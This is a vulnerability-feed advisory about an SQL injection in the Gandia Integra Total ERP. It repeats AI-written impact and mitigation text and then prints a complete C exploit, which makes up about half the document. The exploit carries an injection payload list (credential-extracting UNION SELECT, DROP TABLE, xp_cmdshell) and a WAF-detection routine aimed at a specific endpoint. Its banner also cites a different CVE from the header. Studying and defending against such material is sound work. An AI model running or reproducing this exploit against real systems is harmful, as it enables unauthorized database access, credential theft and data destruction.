Gandia Integra Total 4.4.2236.1 - SQL Injection
Gandia Integra Total 4.4.2236.1 - SQL Injection
AI Analysis
Technical Summary
The security threat concerns an SQL Injection vulnerability in Gandia Integra Total version 4.4.2236.1. SQL Injection is a common web application vulnerability where an attacker can manipulate backend SQL queries by injecting malicious input through user-controllable parameters. This can lead to unauthorized data access, data modification, or even full system compromise depending on the database privileges and application logic. Gandia Integra Total is a software product used for enterprise resource planning (ERP) and business management, which typically handles sensitive business data such as financial records, customer information, and operational data. The presence of an SQL Injection vulnerability in this software means that an attacker could potentially execute arbitrary SQL commands on the backend database, bypass authentication, extract confidential data, or alter data integrity. The exploit code is publicly available and written in C, which indicates that the vulnerability can be reliably exploited by attackers with moderate technical skills. Although no specific affected versions are listed beyond 4.4.2236.1, the lack of patch information suggests that the vulnerability may remain unpatched or that users need to verify their version status. No known exploits in the wild have been reported yet, but the availability of exploit code increases the risk of future attacks. The vulnerability is classified as medium severity, reflecting a balance between the potential impact and the complexity of exploitation.
Potential Impact
For European organizations using Gandia Integra Total, this SQL Injection vulnerability poses significant risks to confidentiality, integrity, and availability of critical business data. Successful exploitation could lead to unauthorized disclosure of sensitive corporate and customer information, potentially violating GDPR and other data protection regulations. Data manipulation could disrupt business operations, financial reporting, and supply chain management. The reputational damage and regulatory penalties resulting from data breaches could be substantial. Additionally, attackers might leverage this vulnerability as a foothold for further network intrusion or lateral movement within the enterprise environment. Given the ERP nature of the software, the impact could extend to multiple departments and business units, amplifying operational disruption. Organizations in sectors such as manufacturing, retail, and services that rely on Gandia Integra Total for core business processes are particularly at risk. The medium severity rating suggests that while exploitation is feasible, it may require some level of technical skill or specific conditions, but the presence of public exploit code lowers the barrier for attackers.
Mitigation Recommendations
European organizations should immediately verify their use of Gandia Integra Total and identify the exact software version deployed. Since no official patch links are provided, organizations should contact the vendor for security updates or advisories. In the interim, implement strict input validation and sanitization on all user inputs interacting with the database to prevent injection attacks. Employ Web Application Firewalls (WAFs) with SQL Injection detection and blocking capabilities tailored to the application’s traffic patterns. Conduct thorough code reviews and penetration testing focused on SQL Injection vectors within the application. Restrict database user privileges to the minimum necessary, avoiding use of highly privileged accounts for application database connections. Monitor database logs and application logs for unusual query patterns or errors indicative of injection attempts. Educate developers and administrators on secure coding practices and the risks of SQL Injection. Consider network segmentation to isolate critical ERP systems and limit exposure. Finally, prepare an incident response plan specifically addressing potential exploitation of this vulnerability.
Affected Countries
Spain, Germany, France, Italy, United Kingdom, Netherlands
Indicators of Compromise
- exploit-code: /* * Author : Byte Reaper * CVE : CVE-2025-41373 * Vulnerability : SQL * Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=<input> * Affected Versions : 2.1.2217.3 to v4.4.2236.1 * Description: * This endpoint concatenates the `idestudio` parameter directly into an SQL query * without proper sanitization or parameterization, allowing an attacker to inject * arbitrary SQL. We leverage both boolean-based and time-based techniques to detect. */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <time.h> #include <unistd.h> #define FULL_URL 4300 int verbose = 0; int useC = 0; const char *url = NULL; const char *cookies = NULL; void sleepSyscall(void) { struct timespec sleepR; sleepR.tv_sec = 1; sleepR.tv_nsec = 0; __asm__ volatile ( "mov $35, %%rax\n\t" "mov %0, %%rdi\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "r" (&sleepR) : "rax", "rdi", "rsi", "rcx", "r11", "memory" ); } void exitAssembly(void ) { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } void uid(void) { const char *mes1 = "\e[1;36m[+] Run Exploit Root Successfully\e[0m\n"; size_t len1 = strlen(mes1); const char *mes2 = "\e[1;31m[-] Please Run Exploit In Root, Exit...\e[0m\n"; size_t len2 = strlen(mes2); __asm__ volatile( "mov $107, %%rax\n\t" "syscall\n\t" "cmp $0, %%rax\n\t" "JZ .root\n\t" "jmp .not_root\n\t" ".root:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[mes1], %%rsi\n\t" "mov %[len1], %%rdx\n\t" "syscall\n\t" "jmp .end\n\t" ".not_root:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[mes2], %%rsi\n\t" "mov %[len2], %%rdx\n\t" "syscall\n\t" ".end:\n\t" : : [mes1] "r" (mes1), [len1] "r" (len1), [mes2] "r" (mes2), [len2] "r" (len2) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); } const char *payload[] = { "' OR '1'='1", "\" OR \"1\"=\"1", "' OR 1=1 --", "\" OR 1=1 --", "' OR '1'='1' --", "' OR 1=1#", "' OR 1=1/*", "admin'--", "admin' #", "admin'/*", "' OR 1=1-- -", "' OR/**/1=1--", "'/**/OR/**/1=1#", "' OR%%201=1--", "' OR%%091=1--", "' OR%0a1=1--", "' OR%%0b1=1--", "' oR 1=1--", "' Or 1=1--", "' oR/**/1=1--", "' OR 0x31=0x31--", "1; DROP TABLE users --", "1; EXEC xp_cmdshell('dir') --", "UNION SELECT NULL,NULL,NULL --", "UNION SELECT username,password FROM users --", "' UNION SELECT NULL,NULL,NULL --", "' UNION SELECT NULL,NULL,NULL#", ",(select * from (select(sleep(4)))a)", "';WAITFOR DELAY '0:0:4'--", NULL }; const char *word[] = { "SQL syntax", "syntax error", "mysql_fetch", "mysql_num_rows", "You have an error in your SQL syntax", "Warning: mysql", "Warning: pg_", "Unclosed quotation mark", "Microsoft OLE DB Provider for SQL Server", "Microsoft SQL Native Client error", "ODBC SQL Server Driver", "ORA-01756", "ORA-00933", "SQLSTATE", "PDOException", "invalid query", "mysql_numrows()", "mysql_result()", "mysql_query()", "Query failed", "Syntax error", "DB error", "error in your SQL syntax", "Unexpected end of SQL command", "Incorrect syntax near", "user", "admin", NULL }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void clean(char *buffer, size_t len, CURL *curl,char *encode ) { free(buffer); buffer = NULL; len = 0; curl_easy_cleanup(curl); curl_free(encode); } int waf = 0; int wafD(const char *urlW) { CURL *curl = curl_easy_init(); CURLcode res; struct Mem wafServer; wafServer.buffer= NULL; wafServer.len = 0; const char *payloadSql = "OR 1=1 --"; char *encode = curl_easy_escape(curl, payloadSql, strlen(payloadSql)); char full[FULL_URL]; if (!encode) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); clean(wafServer.buffer, wafServer.len, curl, encode); exitAssembly(); } int len = snprintf(full, sizeof(full), "%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s", urlW, encode); if (len < 0 || (size_t)len >= sizeof(full)) { printf("\e[1;31m[-] FULL URL Is Long \n"); clean(wafServer.buffer, wafServer.len,curl,encode); exitAssembly(); } if (curl == NULL || !curl) { printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n"); clean(wafServer.buffer, wafServer.len, curl, encode); exitAssembly(); } int result = 0; if (curl) { printf("\e[1;35m===========================================================================================\e[0m\n"); printf("\e[1;35m[+] Scan WAF Start...\e[0m\n"); printf("\e[1;37m[+] FULL URL : %s\e[0m\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &wafServer); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepSyscall(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *h = NULL; h = curl_slist_append(h, "User-Agent: sqlmap"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); res = curl_easy_perform(curl); curl_slist_free_all(h); double timeWaf = 0; if (res == CURLE_OK) { int a = 0; int b =1; int c = 3; int d = 4; long code; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &timeWaf); printf("\e[1;36m[+] Check Http Code...\e[0m\n"); printf("\e[1;32m[+] Http Code => %ld\e[0m\n", code); if (code == 500 || code == 403 || code == 406) { printf("\e[1;35m---------------------------------------\e[0m\n"); printf("\e[1;34m[+] Http Code (500, 403, 406) ! \e[0m\n"); printf("\e[1;34m[+] Waf Detect (Page Not Found) \e[0m\n"); printf("\e[1;35m--------------------------------------\e[0m\n"); a = 1; } else { printf("\e[1;31m[-] Not Detected Waf (HTTP CODE) !\e[0m\n"); } printf("\e[1;36m[+] Check Response Server (NULL)\e[0m\n"); const char *wordWaf[] = { "cloudflare", "sucuri", "mod_security", "incapsula", "akamai", "f5-big-ip", "waf", "firewall", "blocked", "access denied", "forbidden", "security", "protected by", "request rejected", "webshield", "ddos protection", "intrusion prevention", "proxy server", "bot detection", "deny", "you have been blocked", "unauthorized", "client blocked", "blocked by firewall", "bad request", "threat", "filtering", "deny access", "rule id", NULL }; if (code >= 200 && code < 300) { if (wafServer.buffer) { printf("\e[1;35m-------------------------------------------------------------\e[0m\n"); printf("\e[1;34m[+] Http Code (200,202...) ! \e[0m\n"); printf("\e[1;34m[+] Waf Detect, Response is NULL And Http Code Positive \e[0m\n"); printf("\e[1;35m-------------------------------------------------------------\e[0m\n"); b = 1; } else { printf("\e[1;31m[-] Response Buffer Not NULL\e[0m\n"); printf("\e[1;31m[-] Waf Not Detected (NULL Response)!\e[0m\n"); } } printf("\e[1;36m[+] Check Response Buffer...\n"); for (int u = 0; wordWaf[u] != NULL; u++) { if (strstr(wafServer.buffer, wordWaf[u]) != NULL) { printf("\e[1;35m-------------------------------------------------------------\e[0m"); printf("\e[1;34m[+] Waf Detect, Word Waf Found \e[0m\n"); printf("\e[1;34m[+] Word : %s \e[0m\n", wordWaf[u]); printf("\e[1;35m-------------------------------------------------------------\e[0m"); c = 1; } else { if (verbose) { printf("\e[1;31m[-] Word Not Found in Response : %s\e[0m\n", wordWaf[u]); printf("\e[1;35m====================================================\e[0m\n"); } } } printf("\e[1;36m[+] Check Time Response Server...\e[0m\n"); if (timeWaf >= 3.0) { printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeWaf); } else { printf("\e[1;31m[-] Not Detect Waf (Time) !\e[0m\n"); } printf("\e[1;35m==========================\e[0m\n"); printf("\e[1;33m[+] Result Scan : \e[0m\n"); if (a || b || c || d) { printf("\e[1;31m[-] Waf Detected \e[0m\n"); result = 0; } else { printf("\e[1;34m[+] Not Detect Waf !\e[0m\n"); result =1; } printf("\e[1;35m===========================================================================================\e[0m\n"); } else { printf("\e[1;31m[-] No connection reset error.\e[0m\n"); printf("\e[1;31m[-] Error Send Request, Please Check Your Connection !\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } } curl_easy_cleanup(curl); free(wafServer.buffer); wafServer.buffer = NULL; wafServer.len = 0; return result; } void httpRequest(const char *url) { CURL *curl = curl_easy_init(); struct Mem response; CURLcode res; response.buffer =NULL; response.len = 0; if (!curl || curl == NULL) { printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n"); printf("\e[1;31m[-] Please Check Your Connection\e[0m\n"); exitAssembly(); } int y = 0; if (curl) { printf("\e[1;34m[+] Create CURL Successfully\e[0m\n"); for (int pL = 0; payload[pL] != NULL; pL++) { char full[FULL_URL]; char *encodePayload = curl_easy_escape(curl, payload[pL], strlen(payload[pL])); if (!encodePayload) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); clean(response.buffer, response.len, curl, encodePayload); exitAssembly(); } int lenF = snprintf(full, sizeof(full), "%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s", url,encodePayload); if (lenF < 0 || (size_t)lenF >= sizeof(full)) { printf("\e[1;31m[-] FULL URL is LONG ! \n"); clean(response.buffer, response.len, curl, encodePayload); exitAssembly(); } printf("\e[1;37m[+] Encode Payload : %s\e[0m\n", encodePayload); printf("\e[1;37m[+] Base URL : %s\e[0m\n", url); printf("\e[1;37m[+] Full URL : %s\e[0m\n", full); char ip[256]; if (sscanf(full, "http://%255[^/]/encuestas/", ip) == 1) { printf("\e[1;37m[+] target Ip / Domain : %s\e[0m\n", (char *)ip); y = 1; } else { printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n"); y = 0; } curl_easy_setopt(curl, CURLOPT_URL, full); if (useC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepSyscall(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *headers = NULL; headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); char r[130]; int lenR = snprintf(r, sizeof(r), "Referer: %s", url); if (lenR < 0 || (size_t)lenR >= sizeof(r)) { printf("\e[1;31m[-] Len Header Referer Is long !\e[0m\n"); clean(response.buffer,response.len, curl, encodePayload); exitAssembly(); } headers = curl_slist_append(headers, r); headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Content-Type: application/x_222-form-urlencoded"); if (y == 0) { char host[230]; int lenHo = snprintf(host , sizeof(host), "Host: %s",ip); headers = curl_slist_append(headers, host); } headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); free(response.buffer); response.buffer = NULL; response.len = 0; time_t start = clock(); if (res == CURLE_OK) { long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;31m--------------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); if (response.buffer) { printf("\e[1;34m\n======================================== [RESPONSE] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;34m==============================================================================================\e[0m\n"); } else { printf("\e[1;31m[-] Response Is NULL !\e[0m\n"); } if (httpCode >= 200 && httpCode < 300) { for (int o = 0; word[o] != NULL; o++) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",httpCode); if (response.buffer) { if (strstr(response.buffer, word[o]) != NULL) { printf("\e[1;34m[+] Word Found In Response : %s\e[0m\n", word[o]); printf("\e[1;34m[+] The vulnerability CVE-2025-41373 exists on the server\e[0m\n"); printf("\e[1;35m\n======================================== [RESPONSE] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %zu\e[0m\n", response.len); printf("\e[1;35m==============================================================================================\e[0m\n"); } else { if (verbose) { printf("\e[1;31m[-] Word Not Found In Response : %s\e[0m\n", word[o]); } continue; } } } time_t end = clock(); double totalTime = (double)(end - start) / CLOCKS_PER_SEC; if (totalTime <= 5.5) // Payload Sleep 4s + Assembly Sleep (1s) = 4 + 1 + 0.5 (Time (LIBCURL)) = 5.5 { printf("\e[1;33m[+] Check Time Base....\e[0m\n"); printf("\e[1;34m[+] Time Based Injection Detected .\e[0m\n"); printf("\e[1;34m[+] Total Time Sleep Server : %f\e[0m\n", totalTime); } else { printf("\e[1;31m [-] Time Based Injection Not Detected !\e[0m\n"); } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode); } } else { printf("\e[1;31m[-] Error Send Request\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } printf("\e[1;34m[+] Try Next Payload SQL : %s\e[0m\n", encodePayload); } } response.buffer = NULL; response.len = 0; curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▖▖▗ ▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▌▜ ▄▌ ▌▄▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌▟▖▄▌ ▌▄▌ \n" "\e[1;37m \t\tByte Reaper\e[0m\n" ); curl_global_init(CURL_GLOBAL_DEFAULT); int noColor = 0; int w = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Target IP "), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_BOOLEAN('w', "waf", &w, "Scan Waf"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (url == NULL) { printf("[-] Please Enter Target URL !\n"); printf("[-] Ex : ./exploit -u <URL> \n"); curl_global_cleanup(); exitAssembly(); }; printf("---------------------------------------------------------------------\n\n"); printf("[+] Start Exploit (CVE-2025-54589)...\n"); uid(); if (cookies) { useC = 1; } if (verbose) { verbose = 1; } if (w) { wafD(url); } else { httpRequest(url); } curl_global_cleanup(); return 0; }
Gandia Integra Total 4.4.2236.1 - SQL Injection
Description
Gandia Integra Total 4.4.2236.1 - SQL Injection
AI-Powered Analysis
Technical Analysis
The security threat concerns an SQL Injection vulnerability in Gandia Integra Total version 4.4.2236.1. SQL Injection is a common web application vulnerability where an attacker can manipulate backend SQL queries by injecting malicious input through user-controllable parameters. This can lead to unauthorized data access, data modification, or even full system compromise depending on the database privileges and application logic. Gandia Integra Total is a software product used for enterprise resource planning (ERP) and business management, which typically handles sensitive business data such as financial records, customer information, and operational data. The presence of an SQL Injection vulnerability in this software means that an attacker could potentially execute arbitrary SQL commands on the backend database, bypass authentication, extract confidential data, or alter data integrity. The exploit code is publicly available and written in C, which indicates that the vulnerability can be reliably exploited by attackers with moderate technical skills. Although no specific affected versions are listed beyond 4.4.2236.1, the lack of patch information suggests that the vulnerability may remain unpatched or that users need to verify their version status. No known exploits in the wild have been reported yet, but the availability of exploit code increases the risk of future attacks. The vulnerability is classified as medium severity, reflecting a balance between the potential impact and the complexity of exploitation.
Potential Impact
For European organizations using Gandia Integra Total, this SQL Injection vulnerability poses significant risks to confidentiality, integrity, and availability of critical business data. Successful exploitation could lead to unauthorized disclosure of sensitive corporate and customer information, potentially violating GDPR and other data protection regulations. Data manipulation could disrupt business operations, financial reporting, and supply chain management. The reputational damage and regulatory penalties resulting from data breaches could be substantial. Additionally, attackers might leverage this vulnerability as a foothold for further network intrusion or lateral movement within the enterprise environment. Given the ERP nature of the software, the impact could extend to multiple departments and business units, amplifying operational disruption. Organizations in sectors such as manufacturing, retail, and services that rely on Gandia Integra Total for core business processes are particularly at risk. The medium severity rating suggests that while exploitation is feasible, it may require some level of technical skill or specific conditions, but the presence of public exploit code lowers the barrier for attackers.
Mitigation Recommendations
European organizations should immediately verify their use of Gandia Integra Total and identify the exact software version deployed. Since no official patch links are provided, organizations should contact the vendor for security updates or advisories. In the interim, implement strict input validation and sanitization on all user inputs interacting with the database to prevent injection attacks. Employ Web Application Firewalls (WAFs) with SQL Injection detection and blocking capabilities tailored to the application’s traffic patterns. Conduct thorough code reviews and penetration testing focused on SQL Injection vectors within the application. Restrict database user privileges to the minimum necessary, avoiding use of highly privileged accounts for application database connections. Monitor database logs and application logs for unusual query patterns or errors indicative of injection attempts. Educate developers and administrators on secure coding practices and the risks of SQL Injection. Consider network segmentation to isolate critical ERP systems and limit exposure. Finally, prepare an incident response plan specifically addressing potential exploitation of this vulnerability.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52388
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Gandia Integra Total 4.4.2236.1 - SQL Injection
/* * Author : Byte Reaper * CVE : CVE-2025-41373 * Vulnerability : SQL * Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=<input> * Affected Versions : 2.1.2217.3 to v4.4.2236.1 * Description: * This endpoint concatenates the `idestudio` parameter directly into an SQL query * without proper sanitization or parameterization, allowing an attacker to inject * arbitrary SQL. We leverage both boolean-based and time-based tech... (23043 more characters)
Threat ID: 68900844ad5a09ad00dd9e0b
Added to database: 8/4/2025, 1:09:24 AM
Last enriched: 8/4/2025, 1:11:00 AM
Last updated: 8/6/2025, 5:44:43 AM
Views: 10
Related Threats
U.S. CISA adds D-Link cameras and Network Video Recorder flaws to its Known Exploited Vulnerabilities catalog
MediumGoogle fixed two Qualcomm bugs that were actively exploited in the wild
MediumAndroid gets patches for Qualcomm flaws exploited in attacks
HighPwn2Own Offers $1m for Zero-Click WhatsApp Exploit
HighMicrosoft Edge (Chromium-based) 135.0.7049.114/.115 - Information Disclosure
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.